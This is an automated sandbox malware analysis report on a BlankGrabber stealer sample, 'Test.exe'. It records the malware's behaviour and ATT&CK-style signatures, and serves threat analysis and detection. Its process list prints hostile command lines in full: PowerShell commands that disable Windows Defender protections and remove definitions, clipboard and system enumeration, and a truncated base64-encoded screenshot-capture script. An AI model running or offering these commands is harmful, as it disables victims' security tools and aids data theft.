Malware Analysis Report

2024-10-10 08:27

Sample ID 240603-ma925acc67
Target Test.exe
SHA256 45f1bde758b218562cc91da3dd5a14ab0974a9d12c345dd522f9696a1ae901ca
Tags
blankgrabber upx execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

45f1bde758b218562cc91da3dd5a14ab0974a9d12c345dd522f9696a1ae901ca

Threat Level: Known bad

The file Test.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber upx execution

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Enumerates processes with tasklist

Detects videocard installed

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 10:16

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 10:16

Reported

2024-06-03 10:19

Platform

win7-20240221-en

Max time kernel

117s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Test.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Users\Admin\AppData\Local\Temp\Test.exe
PID 2076 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Users\Admin\AppData\Local\Temp\Test.exe
PID 2076 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Users\Admin\AppData\Local\Temp\Test.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Test.exe

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

C:\Users\Admin\AppData\Local\Temp\Test.exe

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI20762\python311.dll

MD5 ccdbd8027f165575a66245f8e9d140de
SHA1 d91786422ce1f1ad35c528d1c4cd28b753a81550
SHA256 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971
SHA512 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311

memory/1296-23-0x000007FEF5EF0000-0x000007FEF64E2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 10:16

Reported

2024-06-03 10:19

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Test.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4992 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Users\Admin\AppData\Local\Temp\Test.exe
PID 4992 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Users\Admin\AppData\Local\Temp\Test.exe
PID 212 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4740 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4740 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2584 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2584 wrote to memory of 3604 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3952 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3952 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 212 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 2372 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 212 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 4876 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4876 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 212 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 3364 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3364 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 2264 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2264 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 212 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 3804 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 2664 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4752 wrote to memory of 1268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4752 wrote to memory of 1268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3804 wrote to memory of 2940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3804 wrote to memory of 2940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4360 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4360 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2760 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2760 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5000 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5000 wrote to memory of 2124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1704 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 212 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Test.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Test.exe

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

C:\Users\Admin\AppData\Local\Temp\Test.exe

"C:\Users\Admin\AppData\Local\Temp\Test.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC